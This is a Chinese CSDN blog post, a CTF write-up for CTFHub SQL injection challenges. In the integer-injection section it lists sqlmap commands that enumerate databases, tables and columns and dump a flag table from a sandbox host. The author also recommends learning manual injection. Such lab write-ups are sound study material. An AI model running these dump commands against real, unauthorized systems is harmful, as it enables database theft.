标题CTFHub 技能树 之SQL注入
一:SQL整数型注入
开题出现的界面是这样的,根据提示输入 1 后,出现两处回显,这里可以使用
工具注入也可以使用手工注入。
手工注入可以看一下这个博主写的查看手工注入
如果想了解工具的话就继续往下看吧☺
我使用的是 kali 自带的 sqlmap 工具
1)因为一开始我们就已经知道存在注入点,于是这个步骤可有可无,但是还是可以看看数据库版本信息
sqlmap -u http://challenge-96abcc6d23e688fa.sandbox.ctfhub.com:10080/?id=2
2)读取数据库库名
sqlmap -u http://challenge-96abcc6d23e688fa.sandbox.ctfhub.com:10080/?id=1 --dbs
得到数据库 sqli
3)得到库名就开始爆表
sqlmap -u http://challenge-96abcc6d23e688fa.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables
表里有一个表名为 flag 的表
4)既然库名表名都有了,接下来就是看表结构
sqlmap -u http://challenge-96abcc6d23e688fa.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns
里面也就一个flag
5)拿flag
sqlmap -u http://challenge-96abcc6d23e688fa.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag -C flag --dump
大家还是去实际操作一下,因为技能树中的除了彩蛋的flag是静态的,其它的都是动态了呢
二、字符型注入
这个题目打开依然是有两个回显点
还是先用sqlmap爆一下
这个题就不多啰嗦了,用sqlmap和前面整数型注入的步骤一样
1)爆库
2)爆表
3)爆flag
在最后爆flag提交时,出现了点小问题,出来的flag是上图形式的,我也不知道为什么,就在flaghub后添加了一个 { 然后本来弹出来的是错误,说实话我也不知道为什么,再次修改提交,然后弹出“该靶机未开启”,我还以为是时间到了,然后刷新看一下,发现已经完成了,我懵了,也不知道我提交的哪一个flag是正确的
o(╥﹏╥)o
三、报错注入
手工注入
大家可以看一下另一位师傅写的博客
手工注入
因为我也是直接用的万能工具sqlmap,还是上面那几个步骤就可以找到flag。
本来想让自己挑战一下的,可是时间不等人,也就放弃了
总结一下,sqlmap是万能的,没有sqlmap是万万不能的,不过如果是想好好学一下sql注入,还是建议用手工注入。后面的题都是可以用sqlmap扫出来的。本人也是小白,为了能好好了解,决定还是好好去了解一下手工注入,哈哈,不能完全依赖工具
来源:CSDN
作者:咖喱酱紫
链接:https://blog.csdn.net/qq_45382830/article/details/104673580